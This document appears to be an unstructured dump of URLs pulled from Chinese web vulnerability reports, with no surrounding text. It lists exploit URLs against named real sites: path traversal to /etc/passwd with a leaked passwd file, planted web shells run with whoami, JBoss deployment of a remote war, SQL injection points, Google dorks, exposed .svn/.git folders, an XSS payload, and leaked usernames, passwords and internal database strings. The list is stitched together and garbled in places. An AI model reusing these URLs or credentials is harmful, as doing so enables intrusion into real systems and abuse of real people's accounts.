http://xjjtedu.ss.cqvip.com/Trace.axd http://xmygz.ss.cqvip.com/Trace.axd http://ccd2.cqvip.com/Trace.axd http://gzmu.ss.cqvip.com/Trace.axd http://auoaf.ss.cqvip.com/Trace.axd http://heuet.ss.cqvip.com/Trace.axd http://zime.ss.cqvip.com/Trace.axd http://exam.cqvip.com/Trace.axd http://lib.cqvip.com/Trace.axd http://qikan.cqvip.com/Trace.axd http://xbmu.ss.cqvip.com/Trace.axd http://ci.cqvip.com/Trace.axd http://hrbcu.ss.cqvip.com/Trace.axd http://lstc.ss.cqvip.com/Trace.axd http://sicnu.ss.cqvip.com/Trace.axd http://info.cqvip.com/Trace.axd http://www.cqvip.com/Trace.axd http://sci.cqvip.com/Trace.axd http://jxsrsp.cqvip.com/Trace.axd 
http://gxkjdxsrsp.cqvip.com/Trace.axd http://gocheck.cqvip.com/Trace.axd http://scut.ss.cqvip.com/Trace.axd http://qzxu.ss.cqvip.com/Trace.axd http://cdnu.ss.cqvip.com/Trace.axd http://gzhtcm.ss.cqvip.com/Trace.axd http://btedu.ss.cqvip.com/Trace.axd http://swjtu.ss.cqvip.com/Trace.axd http://njtc.ss.cqvip.com/Trace.axd http://git.ss.cqvip.com/Trace.axd http://cmc.ss.cqvip.com/Trace.axd http://fjut.ss.cqvip.com/Trace.axd http://fjau.ss.cqvip.com/Trace.axd http://fzu.ss.cqvip.com/Trace.axd http://labos.com.cn:8000/coreextend/extend/login.action,如图所示: http://sjjx.hytc.edu.cn/jingsai/JingSaiJiaoShi.aspx?JingSaiNo=1 http://open.boc.cn http://www.zjlianhua.com/ http://active.lhgw.com.cn/Public/MembPoints.aspx http://active.lhgw.com.cn/Public/MembPoints.aspx http://active.lhgw.com.cn/Public/MembPoints.aspx http://active.lhgw.com.cn/Public/MembPoints.aspx http://history.nju.edu.cn/index.php http://history.nju.edu.cn/show.php?id=3305&menuid=3 http://history.nju.edu.cn/admin/modify_article.php?id=3305 http://210.47.163.50:8080/zypj-2013/download?filename=../../../../../../../../../../../../etc/passwd http://202.100.78.91:7001/jkda http://202.100.78.91:7001 http://222.134.77.234:8080/Main.jsp?init=8 http://www.jnscp.cn/ http://jw.jltu.net/teacher/add_teacher.asp?name=tanqingmin&key=978233&qx=admin http://jw.jltu.net/main/ http://jw.jltu.net/class/open_sutdent.asp?id=4366 http://jw.jltu.net/class/open_sutdent.asp?id=1 http://jw.jltu.net/class/open_sutdent.asp?id=10000 http://db.health.hsw.cn/hospital/1609.shtml http://wscx.hljszgjj.com/ http://www.77l.com/News/gonglue/39556.html http://www.ceboss.cn/ http://rates.homeinns.com/ImageUpload.aspx http://rates.homeinns.com/Mains.aspx?city=hebi@&hotel=039201 http://218.65.5.117:8008/outportal/getbackpassw/getbackPas.jsp http://120.203.196.20/outportal/getbackpassw/getbackPas.jsp http://xzfw.jxcr.gov.cn/outportal/getbackpassw/getbackPas.jsp http://xzfw.jinxi.gov.cn/outportal/getbackpassw/getbackPas.jsp 
http://117.40.187.175:8008/outportal/getbackpassw/getbackPas.jsp http://wssp.jiangxi.gov.cn:8008/outportal/getbackpassw/getbackPas.jsp www.wandaplaza.cn http://www.yumi.com/member/forgot http://42.121.112.222:8080/ http://218.195.234.37/oa_server/InfoTeacherSelect.aspx?id=3711135 http://lib.heuet.edu.cn:8080//oa_server/InfoTeacherSelect.aspx?id=3711135 http://vrs.lib.xju.edu.cn/oa_server/InfoTeacherSelect.aspx?id=3711135 http://59.73.148.27:8080/bj_server/InfoTeacherSelect.aspx?id=3711135 http://211.64.123.12/bj_server//InfoTeacherSelect.aspx?id=3711135 www.chinabook.cc www.xhyd.com www.ducool.cn http://www.xhyd.com/.svn/entries http://video.sdo.com http://video.sdo.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://wx.dodonew.com/manager/html http://dhsh.szkuniu.com/uc_server/ www.dczs.net www.dczs.net www.cnautonews.com www.bonshop.cn www.mshedu.cn www.hbhstj.com www.7cd.cn www.mpsj100.com http://ccaa.open.com.cn/logon.aspx http://ccaa.open.com.cn/User/userAdd.aspx?_loginName=test http://ccaa.open.com.cn/User/userAdd.aspx?_loginName=test&_opT=1 http://bbs.iiyi.com/source/plugin/tools/tools.php http://evt.tiancity.com/survey/survey.php?sname=CMH_CLOSURE http://v3.faqrobot.org/user/findById?Id=3330 http://ets-ccaa.open.com.cn/Register.aspx http://go.aliyun.com http://www.renmaituan.com/homePage.action,来到钱隆贷-人脉团的供应链金融的登陆界面, com.suning.mobile.epa/databases/目录下的 http://www.eloancn.com http://z.eloancn.com/ http://z.eloancn.com/projInfoController.do?projinfo&projectid=3f58a6afef0f447f8f9bf6512c69cb34 http://z.eloancn.com/projInfoController.do?projinfo&projectid=3f58a6afef0f447f8f9bf6512c69cb34 http://qq.m.dianping.com/.git/ https://github.com/lijiejie/GitHack http://author.3gsc.com.cn/.svn/entries http://115.182.12.17/gomesplunk/ http://115.182.12.17:80/manager/html user:admin pass:admin http://115.182.12.17/888/ 
http://115.182.12.17/ak/ http://115.182.12.17/dingfan/ http://115.182.12.17/wooyun/index.jsp http://www.springframework.org/dtd/spring-beans.dtd jdbc:oracle:thin:@115.182.62.217:1521:afodb jdbc:mysql://10.58.46.17:7306/data_assistant?autoReconnect=true&useUnicode=true&characterEncoding=UTF-8&rewriteBatchedStatements=true jdbc:mysql://10.58.47.155:3306/data_assistant?autoReconnect=true&useUnicode=true&characterEncoding=UTF-8 http://61.184.33.201:8888/index.htm http://114.242.111.22/ https://www.ep-link.com/ui/login.jspx https://www.ep-link.com/daozi.jsp https://www.ep-link.com/jspspy.jsp http://thuiyi.docin.com http://open.itcast.cn/ http://open.itcast.cn/php/6-12*.html http://61.191.59.82/ http://photo.hsw.cn:80/Activity/index/catid/24 http://gpswo.hn165.com/ inurl:http://www.chinalife.com.cn/online/propertyPolicy/findRegistDetail.do http://www.chinalife.com.cn/online/propertyPolicy/findRegistDetail.do?mobileOrWY=0&comCode=3110000®istNo=605072014110000024813&policyNo=805072014110108000582 http://www.chinalife.com.cn/online/propertyPolicy/findRegistDetail.do?mobileOrWY=0&comCode=3310000®istNo=605012014310000056916&policyNo=805012014310115003266 http://www.cgdc-sd.com/ inurl:http://realname.xinnet.com/uploadcdn.do?method= http://realname.xinnet.com/uploadcdn.do?method=uploadPic&domainStr=leizhenkm.cn&rad=0.6171259343637968&password=57195bd01a1b85aa12d0ff85599a16b9289d58c54bf5c217 http://realname.xinnet.com/uploadcdn.do?method=uploadPic&domainStr=imuwang.cn&rad=0.3519226693447535&password=57581d76c09605f75d05ae6c21375e152d6d478b08538e20 inurl:KonkaSellUnReport.do?method=list&username= http://qdgl.konka.com/webservice/KonkaSellUnReport.do?method=list&username=%E8%91%A3%E6%9C%9D%E8%BE%89&__username=%E8%91%A3%E6%9C%9D%E8%BE%89&user_id=39375&userpass=0&__password=0 http://qdgl.konka.com/login.do http://www.masstudy.cn/web/index.aspx http://www.qhdzsxx.com/web/index.aspx http://www.whzsjy.cn/web/index.aspx http://www.ycsqjy.com/web/index.aspx 
http://ylllstudy.com/web/index.aspx http://admin.flyapp.me/login/index http://shop.neusoft.edu.cn/GoodsDetailServlet?used_prod_id=存在注射漏洞,获取 http://www.job5156.com http://1.1.1.1:8000/ http://gj.tempus.cn http://gj.tempus.cn http://envi.ruc.edu.cn/competition/dede/za.php http://envi.ruc.edu.cn/competition/dede/h.php http://kefu.xmbtn.com/is/cmd.jsp?pwd=023&cmd=whoami http://wooyun.org/bugs/wooyun-2010-09259 http://www.foosun.net http://www.jshtgz.com.cn http://www.xfxww.com http://www.luohe.tv http://www.motorchina.com http://www.sxczps.gov.cn gcxy.ynau.edu.cn/Admins/Admin_Main.aspx http://www.fjzhrs.gov.cn/show_gg.asp http://sqlmap.org http://bbc.ztgame.com:8090/ http://www.kflib.cn:8089/opac/index_info.jsp http://scsk.crsp.org.cn:8070/opac/index_info.jsp http://211.86.195.15:8086/opac/index_info.jsp http://scsk.crsp.org.cn:8070/opac/index_info.jsp http://58.133.216.9:8070/opac/index_info.jsp http://www.kflib.cn:8090/opac/index_info.jsp http://58.118.253.4:8070/opac/index_info.jsp http://222.56.16.81:8089/opac/index_info.jsp http://lib.hhhxy.cn:88/opac/index_info.jsp http://59.51.114.198:8088/opac/index_info.jsp http://tsjs.ndjclib.com:8070/opac/index_info.jsp http://scsk.crsp.org.cn:8070/opac/index_info.jsp http://www.jnbank.cc:8000/jnrcb/searchChannel http://58.49.53.10/ http://113.105.64.247 http://api1.tempus.cn http://113.105.64.247/FaxFile/ http://yygl.ikanshu.cn:80/admin/statistic.do?method=datalist&dsId=3 http://www.fanwe.com http://t2.fanwe.net:86/ http://group.tempus.cn/pw/job2/ http://group.tempus.cn/pw/job2/UI/Download/ http://www.bsu.edu.cn/ http://121.13.248.37:8080/yljg/yljg/getYljgListAction.action http://121.13.248.37:8080/yljg/1.txt http://bbs.ipark.cn/.svn/entries http://58.215.43.21:8080/ http://m.chinahr.com/findpassword.html http://mail2.glsc.com.cn:8084/names.nsf?Login http://sd.189.cn/ju/index.action http://bbs.touna.cn/resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml http://d.pigai.org/?act=mid_vs&corpus=bj1&cp0=1 
http://hotel.tempus.cn/page_load/login.aspx http://group.tempus.cn/pw/job2/admin/MyLogin.aspx https://vpn.yolo24.com/dana-na/auth/url_default/welcome.cgi?p=failed https://mail.yolo24.com http://business.bnu.edu.cn:8080/seba/login/login.jspa http://business.bnu.edu.cn:8080/seba/1.txt http://group.tempus.cn/pw/job2/UI/company_info_p.aspx?company_id=178 http://simc.creditease.cn/login/login!login.action http://smp.creditease.cn/updatepassword/updatepassword!insert.action http://smp.creditease.cn/search.jsp http://events.csdn.net/ophonequiz/manager/ http://events.csdn.net/qs/exuberance/manager/ http://events.csdn.net/SoftwareSelection2009/manager/ http://events.csdn.net/jazz/manager/ http://events.csdn.net/ophonejd/manager/ http://events.csdn.net/chinacloud/manager/ http://events.csdn.net/CSGS2011/manager/ http://events.csdn.net/tcl/manager/ http://events.csdn.net/IBM/innovate2010/manager/ http://events.csdn.net/SonyEricsson/quiz/manager/ http://events.csdn.net/SAP/crystal/manager/ http://events.csdn.net/IBM/RationalAppScan/manager/ http://rz.hebnews.cn/.svn/entries http://www.sdbcn.net/ http://www.sdbcn.net/Admin_index.asp http://www.sdbcn.net:8080/ http://www.sdbcn.net:8080/is/cmd.jsp?pwd=023&cmd=whoami http://museum.ntua.edu.tw/menu/Main.action google:inurl:companycglist.aspx?ComId=* http://eps.umgg.com.cn/Products/Category_MSelect.aspx?Name=树脂磨盘 http://eps.umgg.com.cn/RAT/Product/HistoryPrice.aspx?kw=1 http://eps.umgg.com.cn/SuperMarket/InterestInfoDetail.aspx?ItemId=1 http://www.cjge-manuscriptcentral.com/Web/QiKan.aspx?Nian=2015&Qi=5 http://www.lcmzxzz.com/Web/QiKan.aspx?Nian=2015&Qi=5 http://gaojian.xhnj.com/Web/QiKan.aspx?Nian=2015&Qi=4 http://xb.cuit.edu.cn/Web/QiKan.aspx?Nian=2012&Qi=5 http://dxjykx.cnmanu.cn/Web/QiKan.aspx?Nian=2014&Qi=6 http://www.jsnyxb.com/Web/QiKan.aspx?Nian=2015&Qi=2 http://www.lcsjwk.com/Web/Qikan.aspx?Nian=2015&Qi=3 http://j.chinatransducers.com/Web/qikan.aspx?Nian=2015&Qi=5 http://www.linpi.net/Web/qikan.aspx?Nian=2012&Qi=5 
http://www.mfskin.net/Web/qikan.aspx?Nian=2015&Qi=5 http://www.gjmzyfs.com/Web/QiKan.aspx?Nian=2015&Qi=3 http://ctc.hlglzz.com/Web/QiKan.aspx?Nian=2015&Qi=5 http://kelonminisite.hisense.com/ajax.php?act=saveEmail&email=177712@qq.com www.qh.lawtv.com.cn https://portal.haier.com/web/reSetPassWord/reset?replyType=1&cn=xxxxxx&tel=&email=&wwwmail=xxxxxxxxxx@163.com http://www.cqsf.com.cn/template/index.php http://rcls.seu.edu.cn/,登录存在SQL注入点,甚至于在chrome浏览器下admin帐号+任意密码,先报错后直接进入 http://**.**.**/adminlogin=error http://yuqing.nais.net.cn:90/om/Index.action存在命令执行漏洞 http://yuqing.nais.net.cn:90/om/mytesttest.jsp密码chopper http://121.40.95.218 http://www.baobaowoaini.cn/meiyi/login.php登陆点 http://111.207.210.120/autoportal/LoginForm.jsp http://202.100.200.203/autoportal/LoginForm.jsp(提示无权限访问,但没关系,漏洞仍然可以利用) http://202.100.200.73/autoportal/LoginForm.jsp http://113.59.108.89/autoportal/LoginForm.jsp http://221.11.139.164/autoportal/LoginForm.jsp(提示无权限访问,但没关系,漏洞仍然可以利用) http://111.207.210.120/autoportal/LoginForm.jsp该站为例 http://111.207.210.120/invoker/JMXInvokerServlet,可通过下面代码进行getshell http://111.207.210.120/invoker/JMXInvokerServlet system:service=MainDeployer http://p2j.cn/is.war http://111.207.210.120/is/index.jsp gms.szkuniu.com/account/login/in http://www.rcsp.cn:8083/lslp/WHOut/DistrictIndex_new.aspx?DFID=RC http://222.135.78.34:8083/lslp/WHOut/DistrictIndex_new.aspx?DFID=RC http://221.2.149.28:8090/lslp/WHOut/DistrictIndex_new.aspx?DFID=XQ http://www.rszwfwzx.gov.cn/lslp/whout/DistrictIndex_new.aspx?DFID=H http://www.whaac.gov.cn:8090/lslp/whout/DistrictIndex_new.aspx?DFID=HC http://data.tiens.com/ https://github.com/chrisyun/history-project/blob/510e1983d51fd7de123536265b95f9fbbeef0cc4/parrot/parrot-data-init/src/main/resources/mail-config.xml http://login.jifentao.com/password/repassword3.jsp http://login.jifentao.com/password/repassword4.jsp https://github.com/Justxu/origin/blob/9eb0dc625662b5735979c226beebc7597d206578/mail.py http://www.189an.cn/front/index.do 
http://admin.lakalaec.com/index http://m.jumei.com/i/MobileWap/request_delegate?url=/etc/passwd http://group.tempus.cn http://www.dag.nwnu.edu.cn/News/detail.asp?newsID=78 http://www.tempusworld.com/web/queryById.action http://122.226.154.126/TSPB/web/pubinfo/pubinfo.jsp?itemType=0&pubType=1 http://220.191.221.174/TSPB/web/hy/pubinfo/pubinfo.jsp?itemType=0&pubType=1 http://www.hyztb.gov.cn/TSPB/web/hy/pubinfo/pubinfo.jsp?itemType=4&pubType=4 http://60.211.194.178/TSPB/qfweb/pubinfo/pubinfo.jsp?itemType=3&pubType=2 http://www.smztb.com.cn/TSPB/web/pubinfo/pubinfo.jsp?itemType=0&pubType=1 http://113.105.64.217/admin/ google:inurl:companycglist.aspx?ComId=* http://eps.umgg.com.cn/Orders/k3orderdetail.aspx?FINTERID=1 http://eps.umgg.com.cn/organization/GetUser_List2.aspx?UserName=test http://eps.umgg.com.cn/person/InviteList.aspx?iType=ZB&comid=1&id=0000 http://www.aegon-cnooc.com/survey/serverdo.jsp?ac=check&code=e&phone=1&stamptime=1432654178771 http://i.club.sohu.com/?action=save&controller=userinfo http://www.dodo178.com http://www.dodo178.com/front/recharge.jsp?account=null&gameid=28&srvid=1 http://www.ln86e.com/Shequ/Search.aspx?page=1&SearchTxt=1&tag=1 zhanshangfuwu.chinajoy.net/admin/admin.php http://www.nbdaj.gov.cn/datk/titans/presz.action?method=getsyInfo存在命令执行漏洞 http://www.dodo178.com/ www.dodo178.com http://jpkc.zzu.edu.cn/hbyycai/flash/step.asp?id=8 http://sqlmap.org http://jpkc.zzu.edu.cn:80/hbyycai/flash/error.asp https://ebank.ccfccb.cn//pweb/prelogin.do?_locale=zh_CN&LoginType=&BankId=313223007007&_viewReferer=/../../js/common.js/%3f http://wooyun.org/bugs/wooyun-2010-088620 http://www.jshn.com.cn:81 http://61.185.224.148:8080 http://www.xzyedu.com.cn:8080 http://218.26.79.12:8080 http://www2.gxwzy.com.cn:60 www.cinemark.com.tw/showDm.asp?id=4 http://rmp.haier.net/admin/ http://photo.hsw.cn:80/Work/column_list/catid/10 http://bbs.shouliwang.com/WebResource.axd?d=1433135288 http://fz.shouliwang.com/WebResource.axd?d=1433137211 
http://my.shouliwang.com/WebResource.axd?d=1433135193 http://pic.shouliwang.com/WebResource.axd?d=1433135962 http://shouliwang.com/WebResource.axd?d=1433135132 http://wys.shouliwang.com/WebResource.axd?d=1433137108 http://www.shouliwang.com/WebResource.axd?d=1433135907 http://www.shouliwang.com/WebResource.axd?d=9MBwmxN6TLKjC8S3CdFGyw2 inurl:http://youxi.baidu.com/password http://youxi.baidu.com/wly/2011-10-20/1321346899.html?username=dao990&password=wang523&Submit= http://youxi.baidu.com http://youxi.baidu.com/qmr/micro-client/?username=buhuiqiming&password=xy13644978794&remember_me= http://youxi.baidu.com/qmr/micro-client/?username=wangzhelong001&password=xy13644978794&remember_me= http://bbs.iqianjin.com//data/restore.php http://lib.cumtb.edu.cn/CommonQusetion.aspx?SectionId=3c369f17-81db-48c6-8b8f-be12707a99f5 http://219.242.65.10/Recommend.aspx?SectionId=b7f8794d-aa0a-4de8-b136-4325f82e992f http://www.tzlib.cn/Special_Resource.aspx?SectionId=1c5d5905-ef91-4f25-a7ee-3b1925d76b28 http://219.242.65.10/ReaderWrite.aspx?SectionId=9a7eef33-7edf-4a2b-8d99-ffe2e6ed61d7 http://118.244.213.93:8018/Map.aspx?SectionId=af17aeb1-8819-4977-9297-c1ba18031bbb http://www.hyxlib.com/Survey_list.aspx?SectionId=dbf6b7bc-12f4-4a36-b1f3-01a69933a0ac http://drtsg.qzjmc.edu.cn:8084/Reader_Buy.aspx?SectionId=7dfbac8d-1ffc-4e70-bd38-5c0a231fd1f2 http://www.nhlib.com.cn/Question.aspx?SectionId=d63b40ad-96e5-41c8-999f-2f9af8cad5fd http://ballgames.confucian.edu.my/ http://ballgames.confucian.edu.my/system http://www.263.net/?chr=gb&func=login&domainType=wm&buttonType=&usr=&domain=&encode=on&username=daibaozhong@kkqianwei.com&pass=11**aaaa http://800.189.cn/file/download.do?file=../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown 
halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:499:496:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin cimsrvr:x:498:500:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin saslauth:x:497:76:"Saslauthd saslauth:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin qpidd:x:496:499:Owner Daemons:/var/lib/qpidd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pulse:x:495:494:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin stap-server:x:155:155:Systemtap Server:/var/lib/stap-server:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin ident:x:98:98::/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin tomcat_fmp:x:611:611::/home/tomcat_fmp:/bin/bash zh_readonly:x:601:601::/home/zh_readonly:/bin/bash http://www.szaudio.com/admin/login.aspx 
http://www.4006001775.com/mobile/theme/btx/order/orderDetail.html?orderId=70551&dev http://www.dfrobot.com.cn/delete_cart_goods.php http://totemdb.whu.edu.cn/homepage/admin/subpage.php?tablename=researcher&type=1 http://www.cjge-manuscriptcentral.com/Web/News.aspx?searchid=163768 http://www.lcmzxzz.com/Web/News.aspx?searchid=586073 http://gaojian.xhnj.com/Web/News.aspx?searchid=313670 http://xb.cuit.edu.cn/Web/News.aspx?searchid=112266 http://dxjykx.cnmanu.cn/Web/News.aspx?searchid=107094 http://www.jsnyxb.com/Web/News.aspx?searchid=1 http://www.lcsjwk.com/Web/News.aspx?searchid=1 http://j.chinatransducers.com/Web/News.aspx?searchid=1 http://www.linpi.net/Web/News.aspx?searchid=1 http://www.mfskin.net/Web/News.aspx?searchid=1 http://www.gjmzyfs.com/Web/News.aspx?searchid=1 http://ctc.hlglzz.com/Web/News.aspx?searchid=328935 http://www.lcjsyx.com/Web/News.aspx?searchid=84777 http://www.apsjournal.com/web/News.aspx?searchid=111061 http://www.cjge-manuscriptcentral.com/Web/NewsShow.aspx?id=31 http://www.lcmzxzz.com/Web/NewsShow.aspx?id=118 http://gaojian.xhnj.com/Web/NewsShow.aspx?id=6 http://xb.cuit.edu.cn/Web/NewsShow.aspx?id=8 http://www.xnumed.com/NewsShow.aspx?id=1 http://www.lcsjwk.com/Web/NewsShow.aspx?id=1 http://j.chinatransducers.com/Web/NewsShow.aspx?id=1 http://www.gjmzyfs.com/Web/NewsShow.aspx?id=1 http://ctc.hlglzz.com/Web/NewsShow.aspx?id=148 http://www.lcjsyx.com/Web/NewsShow.aspx?id=1 http://www.apsjournal.com/Web/NewsShow.aspx?id=1 http://www.025journal.com/demo1/Web/NewsShow.aspx?id=1 http://focus-user.liba.com/login http://www.lgqzwfw.gov.cn/xspww/OutNetChannel/ItemOrgList.aspx http://60.215.8.148:6006//OutNetChannel/ItemOrgList.aspx http://www.lgqzwfw.gov.cn/xspww/OutNetChannel/ItemOrgList.aspx http://shenpi.dongying.gov.cn/fabu/OutNetChannel/ItemOrgList.aspx http://222.135.78.34:8086/OutNetChannel/ItemOrgList.aspx http://zz.yiban.cn/ http://s.suning.com/report.htm#unknown http://221.131.114.12:8001/Struts2/index.action 
http://www.cqyz.gov.cn/web1/info/index.asp?classid=2328 http://www.cqyz.gov.cn/web1/info/index.asp http://sqlmap.org http://www.readphone.com.cn/admin.php http://42.62.3.187:8080/axis2/axis2-admin/ http://yjs.jxutcm.edu.cn/web/ViewDoc.aspx?id=1228 http://ibank.focus.cn/account/ http://ibank.focus.cn/account/BindSafeQuestion http://**.**.**/phpinfo.php http://211.154.135.186:8080/redis.php http://law.ustc.edu.cn/News.php?id=21该网页没有过滤注入字符导致存在注入漏洞 http://www.ntcits.com.cn/ http://www.ntcits.com.cn/App.TASite/admin/Login.aspx http://www.dalitour.gov.cn/admin.php自动跳转到登录页面 http://www.dalitour.gov.cn/index.php?m=admin&c=index&a=login&pc_hash= http://www.dalitour.gov.cn/uploadfile/2015/0601/20150601091337189.jpg/.php http://hunangrain.gov.cn/shenpi/main/upload.jsp http://hunangrain.gov.cn/shenpi/upload/20150602_065848.jsp?pwd=023&i=whoami http://www.1890.gov.cn/upload.jsp http://www.1890.gov.cn/upload/1433198443992@1433198443992.jsp?pwd=023&i=whoami http://12358.ndrc.gov.cn/price/website/record/addmaterial.jsp?runid=201506020642TT00322B17A53F48D082 http://www.dyjc.gov.cn:7001/dataform/upload/upload.jsp http://www.dyjc.gov.cn:7001/download/jcyfj/201506/9C0F229D23B5D758EF02B15AB254516A.jsp?pwd=023&i=whoami http://iayoa.yantai.gov.cn/index.jsp inurl:http://service.caijing.com.cn/usermanage/newpassword/email http://service.caijing.com.cn/usermanage/newpassword/email/d3ltMTIyMUBnbWFpbC5jb20=/checktime/a3e0633ded50c1fe7e46900c4120b302 http://service.caijing.com.cn/usermanage/newpassword/email/c2lsbHltdXBwZXRAMTI2LmNvbQ==/checktime/a37a706ca8a2fc548049ea30b3863c0c http://service.caijing.com.cn/usermanage/newpassword/email/Z3VqZjIyNTIxMkBnbWFpbC5jb20=/checktime/4d2db21377ff4bdca0bae7838652f4cd http://113.105.64.197:82/login.action http://220.178.116.78:7001/defaultroot/public/jsp/singleupload.jsp?path=desktop&mode=add&hiddenName=unitImgSaveName&visualName=unitImgName http://61.178.20.34 http://bec.pigai.org/ http://www.luxcinema.com.tw/web/film_intro.php?film_id=93 
https://tienmou.woviecinemas.com.tw/ticket_wovie.php?pid_for_movie=430 http://sd.sd12318.com/login.html http://www.metrohk.com.hk/index.php?cmd=detail&id=277331 http://bj.feiren.com/flight/passenger_tmc.php?isNew=1&go_from=0 http://bj.feiren.com/home/contact/deletecontact.html?did=762951&tabType=hotelpeople&deletetype= www.daimayi.com/index.php/Ask/index/p/0/type/*.html http://192.168.1.119/view/main/config.cgi http://192.168.1.119 http://www.guolian-life.com/getImage.html?fileUrl=/usr/local/app/upload/images&fileName=wkt_20150320093831932.png http://www.guolian-life.com/getImage.html?fileUrl=/etc&fileName=hosts http://uc.tuanche.com/login/quit http://wx.gx10010.com/Login.aspx http://wx.gx10010.com/main.aspx http://www.e21cn.com/ http://bm.e21cn.com/ http://bm.e21cn.com/log/login.asp http://bm.e21cn.com/adminblock/bminfo/bmtxt.asp?ksid=606&kshid=791936&bminfoid=45801&page=1&ksname=bm_cy100318 http://bm.e21cn.com/adminblock/bminfo/bmtxt.asp?ksid=606&kshid=791937&bminfoid=45801&page=1&ksname=bm_cy100318 http://bm.e21cn.com/adminblock/bminfo/bmtxt.asp?ksid=606&kshid=791937&bminfoid=45801&page=1&ksname=bm_cy100318 URL:http://shop.lkk.com/php/index.php?lang=zh_TW http://timber2005.com/ http://px2.timber2005.com/Webpage/teacher_content.aspx?infoId=556 http://px2.timber2005.com/WebPage/kc_list.aspx?planid=Y29udmVydChpbnQsKEBAdmVyc2lvbikp&examName=%E5%88%9D%E7%BA%A7%E4%BC%9A%E8%AE%A1%E5%B8%88%E5%9F%BA%E7%A1%80%E6%B5%8B%E8%AF%95 http://www.citsgd.com.cn http://www.citsgd.com.cn/shownews.aspx?sid=cits&id=2387 http://www.lgqzwfw.gov.cn/xspww/InteractiveCommunication/InterActiveIndex.aspx http://60.215.8.148:6006//InteractiveCommunication/InterActiveIndex.aspx http://www.lgqzwfw.gov.cn/xspww/InteractiveCommunication/InterActiveIndex.aspx http://shenpi.dongying.gov.cn/fabu/InteractiveCommunication/InterActiveIndex.aspx http://222.135.78.34:8086/InteractiveCommunication/InterActiveIndex.aspx index.php/LoginApi/login/ http://training.transn.com 
http://ads.catarc.info/DSS/login/login.action存在命令执行 http://agent.b2b.cn/Registe!registe.action inurl:class_bjjj.jsp?classId= http://www.dg5x.com/News/ClassNews/class_bjjj.jsp?classId=E201402 http://www.whjksyxx.com/News/ClassNews/class_bjjj.jsp?classId=x201402 http://www.czxqxx.cn/webschool/News/ClassNews/class_bjjj.jsp?classId=x201411 http://www.jyzzsx.net/News/ClassNews/class_bjjj.jsp?classId=x201115 http://www.whjkhsxx.com/News/ClassNews/class_bjjj.jsp?classId=1111 http://v.chengdu.cn/.svn/entries http://mz.hn165.com/pages/jieri.jsp?month=0 http://ssl.elong.com/hotel2/.svn/entries URL:http://www.100eshu.com/ScEbook_Admin/login.aspx a05:11PM a05:25PM a05:07PM a02:11PM a05:29PM a03:16PM a05:25PM a01:59PM a02:33PM a09:00AM a09:00AM a08:33AM a05:26PM a02:02PM a02:15PM a02:04PM a05:19PM a05:20PM a06:46PM a03:40PM a05:54PM a03:59PM a05:26PM a05:26PM a05:27PM a05:28PM a05:28PM a05:29PM a05:12PM a05:46PM a05:47PM a04:12PM a03:04PM a02:16PM a02:16PM a02:17PM a02:25PM a02:25PM a02:26PM a02:27PM a02:28PM a05:13PM a02:28PM a02:29PM a02:30PM a02:31PM a02:43PM a02:43PM a02:43PM a02:45PM a05:15PM a02:45PM a02:45PM a02:46PM a02:47PM a02:47PM a02:47PM a02:48PM a02:48PM a02:51PM a02:52PM a05:19PM a02:53PM a02:53PM a02:55PM a03:16PM a03:17PM a03:18PM a03:18PM a03:19PM a05:24PM a03:20PM a03:22PM a03:22PM a03:23PM a04:27PM a05:24PM a04:29PM a04:30PM a04:31PM a04:32PM a04:32PM a04:32PM a01:53PM http://www.daimayi.com/index.php/Strategy/detail/id/17 http://www.daimayi.com/index.php/Strategy/detail/id/17-1 http://www.daimayi.com/index.php/Strategy/detail/id/16 http://www.ctsxm.cn/ http://114.80.157.152:8080/esp/login/check!checkuser.action http://114.80.157.153:8080/interactionback/login/check!login.action http://v.baidu.com/v?word=zz%22%3E%3Cimg%20src=x%3Exxx&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&ie=utf-8#order=1&sc=4&pn=0 